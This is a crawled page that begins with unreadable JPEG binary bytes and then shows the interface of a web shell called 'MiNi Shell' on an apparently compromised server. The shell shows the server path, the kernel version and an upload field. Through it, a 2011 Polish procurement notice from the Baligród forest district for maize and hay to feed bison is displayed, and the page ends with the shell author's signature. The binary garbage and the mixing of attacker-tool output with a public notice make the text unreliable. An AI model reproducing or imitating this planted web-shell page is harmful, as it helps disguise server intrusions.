JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111020/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111020/275639-N-2011.html

<p class="kh_header"><b>Baligród: Dostawa karmy dla żubrów do Nadleśnictwa Baligród w 2011 r. w ramach realizacji projektu Ochrona in situ żubra w Polsce - część południowa  ZG-2710-5/11</b><br>
<b>Numer ogłoszenia: 275639 - 2011; data zamieszczenia: 20.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Baligród , ul. Balów 14, 38-606 Baligród, woj. podkarpackie, tel. 013 4684015.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_baligrod/zamowienia_publiczne</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa jednostka organizacyjna nie posiadajaca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa karmy dla żubrów do Nadleśnictwa Baligród w 2011 r. w ramach realizacji projektu Ochrona in situ żubra w Polsce - część południowa  ZG-2710-5/11.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia składa się z dwóch części :

-1 część zamówienia: dostawa kukurydzy w ilości 4,0 tony;
Kukurydzę stanowi wysuszone ziarno zapakowane w workach, o wadze 
od 40 kg do 70 kg, pochodzące ze zbiorów 2011 r. Dostawa jednorazowa, obejmująca transport i rozładunek w magazynie zlokalizowanym 
w miejscowości Kołonice.    

- 2 część zamówienia: dostawa siana w ilości 4,0 tony;
Siano stanowi wysuszona trawa, prasowana w wiązane baloty o wadze od 150 kg do 250 kg, pochodząca ze zbiorów 2011 r. Dostawa jednorazowa, obejmująca transport i rozładunek w magazynie zlokalizowanym w miejscowości Kołonice..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.21.12.00-5, 03.11.42.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda zabezpieczenia oferty w postaci wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki  udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy PZP, dotyczące:
a) posiadania uprawnień do wykonywania określonej działalności lub czynności, 
b)   posiadania wiedzy i doświadczenia;
c)   dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
d) sytuacji ekonomicznej i finansowej; 
e) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia 
art. 24 ust. 1 i 2 PZP.

Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia ; 
 - Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia. Umocowanie musi wynikać z treści pełnomocnictwa. 
Uwaga: W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia do oferty należy dołączyć Pełnomocnictwo, którego treść powinna dokładnie określać zakres umocowania.
- W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, każdy z warunków, określonych w punkcie 5 a - d. winien spełniać co najmniej jeden 
z tych Wykonawców albo wszyscy ci Wykonawcy wspólnie. Każdy z wykonawców wchodzących w skład konsorcjum  musi oddzielnie udokumentować brak podstaw 
do wykluczenia na podstawie art. 24 ust. 1 pkt. 1-9. 
1.	Zamawiający żąda wskazania przez Wykonawcę w ofercie (w Formularzu oferty) zadań zamówienia, których wykonanie zamierza powierzyć  podwykonawcom,  przy czym dopuszczalne jest powierzenie podwykonawcom całości zamówienia.
Brak wskazania części zamówienia jakie wykonawca zamierza powierzyć podwykonawcom Zamawiający będzie traktował jako jednoznaczne oświadczenie,
iż  Wykonawca wykona zamówienie bez podwykonawców.
2.	Wykonawcy, którzy  nie wykażą spełnienia warunków udziału w postępowaniu  podlegać będą wykluczeniu z udziału w postępowaniu.
3.	Z udziału w niniejszym postępowaniu wyklucza się wykonawców, którzy podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 PZP. 
4.	Ofertę wykonawcy wykluczonego uważa się za odrzuconą.
5.	Zamawiający odrzuca ofertę jeżeli:
1) jest niezgodną z ustawą PZP,
2) jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, 
z zastrzeżeniem art. 87 ust. 2  pkt. 3 PZP 
3) jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów 
o zwalczaniu  nieuczciwej konkurencji,
4) zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
5) została złożona przez wykonawcę wykluczonego z udziału w postępowaniu 
o udzielenie zamówienia,
6) zawiera błędy w obliczeniu ceny,
7) wykonawca w terminie 3 dni od dnia otrzymania zawiadomienia nie zgodził 
się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 PZP
8) jest nieważna na podstawie odrębnych przepisów.

Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu 
o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego -spełnia/ nie spełnia.

6.1. Oświadczenia i dokumenty, jakie wykonawcy mają dostarczyć w celu potwierdzenia spełniania warunków udziału w postępowaniu:

a)	oświadczenie, że wykonawca spełnia warunki udziału w postępowaniu, określone w art. 22 ust. 1 Pzp - wg wzoru załącznik nr 2 do SIWZ,

6.2. W celu wykazania braku podstaw do wykluczenia Wykonawcy z  postępowania 
o udzielenie zamówienia (art. 24 ust. 1 i 2 PZP) oferta winna zwierać:

a) oświadczenie o braku podstaw do wykluczenia z art. 24 ust. 1 pkt. 1 PZP wg  wzoru, stanowiącego załącznik nr 3 a do SIWZ,

b) oświadczenie (dotyczące tylko Wykonawców, będących osoba fizyczną) o braku podstaw do wykluczenia na podstawie art. 24 ust. 1 pkt 2 PZP  wg  wzoru, stanowiącego załącznik nr 3b do SIWZ .
  UWAGA: 

      W przypadku oferty składanej przez Wykonawców ubiegających się wspólnie 
o udzielenie zamówienia publicznego, oświadczenie o spełnianiu każdego 
z warunków, o którym mowa w art. 22 ust. 1 PZP  składa co najmniej jeden z wykonawców albo wszyscy ci wykonawcy wspólnie.
       
6.3. Zgodnie z art. 8 PZP postępowanie o udzielenia  zamówienia jest jawne. 
6.4. Zamawiający informuje, że zgodnie z art. 96 ust. 3 PZP protokół i składane 
w postępowaniu oferty o zamówienie publiczne są jawne i podlegają udostępnieniu.  
6.5. Zamawiający może ograniczyć dostęp do informacji związanych 
z postępowaniem o udzielenia zamówienia tylko w przypadkach określonych 
w  PZP.
6.6. Nie ujawnia się informacji stanowiących tajemnicę przedsiębiorstwa 
w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, jeśli  Wykonawca, nie później niż w terminie składania ofert, zastrzegł, że nie mogą one być udostępniane. 
		Uwaga:
Przez tajemnicę przedsiębiorstwa w rozumieniu art. 11 ust. 4 ustawy 
z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji ( Dz. U. Nr 153 z 2003 r., poz. 1503, ze. zm.) rozumie się nieujawnione do wiadomości publicznej informacje techniczne, technologiczne, organizacyjne przedsiębiorstwa lub inne informacje posiadające wartość gospodarczą, co do których przedsiębiorca podjął niezbędne działania w celu zachowania ich poufności, tzn. zastrzegł składając ofertę, iż nie mogą być one udostępnione innym uczestnikom postępowania. 
Zamawiający zaleca, aby informacje zastrzeżone jako tajemnica przedsiębiorstwa były przez Wykonawcę złożone w oddzielnej wewnętrznej kopercie z oznakowaniem tajemnica przedsiębiorstwa, lub spięte (zszyte) oddzielnie od pozostałych, jawnych elementów oferty.
Stosowne zastrzeżenie Wykonawca winien złożyć na Formularzu oferty. W przeciwnym razie cała oferta zostanie ujawniona na życzenie każdej zainteresowanej osoby.
 6.7. Wykonawca nie może zastrzec informacji, o których mowa w art. 86 ust. 4. PZP</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki  udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy PZP, dotyczące:
a) posiadania uprawnień do wykonywania określonej działalności lub czynności, 
b)   posiadania wiedzy i doświadczenia;
c)   dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
d) sytuacji ekonomicznej i finansowej; 
e) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia 
art. 24 ust. 1 i 2 PZP.
Oświadczenia i dokumenty, jakie wykonawcy mają dostarczyć w celu potwierdzenia spełniania warunków udziału w postępowaniu:

a)	oświadczenie, że wykonawca spełnia warunki udziału w postępowaniu, określone w art. 22 ust. 1 Pzp - wg wzoru załącznik nr 2 do SIWZ,


Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu 
o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego -spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki  udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy PZP, dotyczące:
a) posiadania uprawnień do wykonywania określonej działalności lub czynności, 
b)   posiadania wiedzy i doświadczenia;
c)   dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
d) sytuacji ekonomicznej i finansowej; 
e) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia 
art. 24 ust. 1 i 2 PZP.
Oświadczenia i dokumenty, jakie wykonawcy mają dostarczyć w celu potwierdzenia spełniania warunków udziału w postępowaniu:

a)	oświadczenie, że wykonawca spełnia warunki udziału w postępowaniu, określone w art. 22 ust. 1 Pzp - wg wzoru załącznik nr 2 do SIWZ,


Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu 
o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego -spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki  udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy PZP, dotyczące:
a) posiadania uprawnień do wykonywania określonej działalności lub czynności, 
b)   posiadania wiedzy i doświadczenia;
c)   dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
d) sytuacji ekonomicznej i finansowej; 
e) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia 
art. 24 ust. 1 i 2 PZP.
Oświadczenia i dokumenty, jakie wykonawcy mają dostarczyć w celu potwierdzenia spełniania warunków udziału w postępowaniu:

a)	oświadczenie, że wykonawca spełnia warunki udziału w postępowaniu, określone w art. 22 ust. 1 Pzp - wg wzoru załącznik nr 2 do SIWZ,


Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu 
o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego -spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki  udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy PZP, dotyczące:
a) posiadania uprawnień do wykonywania określonej działalności lub czynności, 
b)   posiadania wiedzy i doświadczenia;
c)   dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
d) sytuacji ekonomicznej i finansowej; 
e) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia 
art. 24 ust. 1 i 2 PZP.
Oświadczenia i dokumenty, jakie wykonawcy mają dostarczyć w celu potwierdzenia spełniania warunków udziału w postępowaniu:

a)	oświadczenie, że wykonawca spełnia warunki udziału w postępowaniu, określone w art. 22 ust. 1 Pzp - wg wzoru załącznik nr 2 do SIWZ,


Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu 
o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego -spełnia/ nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta powinna zawierać wypełniony Formularz oferty wg załączonego druku - załącznik nr 1 do SIWZ, oświadczenia wymienione w pkt. 6 SIWZ oraz inne dokumenty np. pełnomocnictwo. Oferta musi być napisana w języku polskim, na maszynie do pisania, komputerze lub inną trwałą i czytelną techniką oraz podpisana przez osobę upoważnioną do reprezentowania firmy na zewnątrz i zaciągania zobowiązań w wysokości odpowiadającej cenie oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w formie pisemnej pod rygorem nieważności, w razie wystąpienia jednej lub kilku z poniższych okoliczności :
1	potrzeby zmiany terminu realizacji spowodowanej :
a)	okolicznościami, których nie można było przewidzieć w chwili zawarcia Umowy;
b)	okolicznościami leżącymi po stronie Zamawiającego;
c)	okolicznościami będącymi następstwem działania organów administracji i innych podmiotów trzecich, a także działania siły wyższej.

Ponadto Zamawiający dopuszcza możliwość zmian redakcyjnych umowy, zmian będących następstwem zmian danych zarówno jego jak i Wykonawcy, w tym ujawnionych w rejestrach publicznych (np. zmiana oznaczenia adresu, nazwy wykonawcy, osoby uprawnionej do kontaktów) oraz innych zmian nie stanowiących zmian treści umowy w stosunku do treści oferty. W takiej sytuacji, wprowadzenie do umowy stosownych zmian nie stanowiących zmian treści umowy w stosunku do treści oferty nie będzie wymagało zachowania formy pisemnej, a jedynie notatki/protokołu zatwierdzonego przez przedstawicieli obu stron.
Wszelkie zmiany wprowadzane do umowy dokonywane będą 
z poszanowaniem obowiązków wynikających z przepisów prawa, w tym 
w szczególności nie mogą powodować wykroczenia poza określenie przedmiotu zamówienia zawarte w SIWZ, zgodnie z art. 140 ust. 3 ustawy Prawo zamówień publicznych (t.j. Dz. U. z 2010 r. Nr 113, poz. 759 ze zm.) oraz nie mogą powodować obejścia przepisu art. 144 ustawy Prawo zamówień publicznych. 
Ceny netto określone w umowie/ofercie pozostają niezmienne przez cały okres obowiązywania umowy. Jeżeli w okresie obowiązywania umowy nastąpi zmiana stawki podatku od towarów i usług (VAT), od chwili zmiany podatek w nowej stawce będzie doliczany do dotychczasowych cen netto, bez konieczności zmiany umowy.
Postanowienia umowy zawarto w projekcie umowy, który stanowi załącznik numer 4 do SIWZ.
Warunki zmiany umowy zawartej w postępowaniu o udzielenie zamówienia. 
Strona wnioskująca o zmianę umowy, każdorazowo przedkłada drugiej stronie pisemne uzasadnienie konieczności wprowadzenia zmiany 
do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_baligrod/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Baligród ul. Balów 14, 38-606 Baligród.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.10.2011 godzina 09:00, miejsce: Nadleśnictwo Baligród - Sekretariat ul. Balów 14, 38-606 Baligród.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Infrastruktura i Środowisko oraz Projekt współfinansowany przez Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1 część zamówienia: dostawa kukurydzy w ilości 4,0 tony.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kukurydzę stanowi wysuszone ziarno zapakowane w workach, o wadze 
od 40 kg do 70 kg, pochodzące ze zbiorów 2011 r. Dostawa jednorazowa, obejmująca transport i rozładunek w magazynie zlokalizowanym 
w miejscowości Kołonice..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.12.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 2 część zamówienia: dostawa siana w ilości 4,0 tony;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Siano stanowi wysuszona trawa, prasowana w wiązane baloty o wadze od 150 kg do 250 kg, pochodząca ze zbiorów 2011 r. Dostawa jednorazowa, obejmująca transport i rozładunek w magazynie zlokalizowanym w miejscowości Kołonice..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.11.42.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com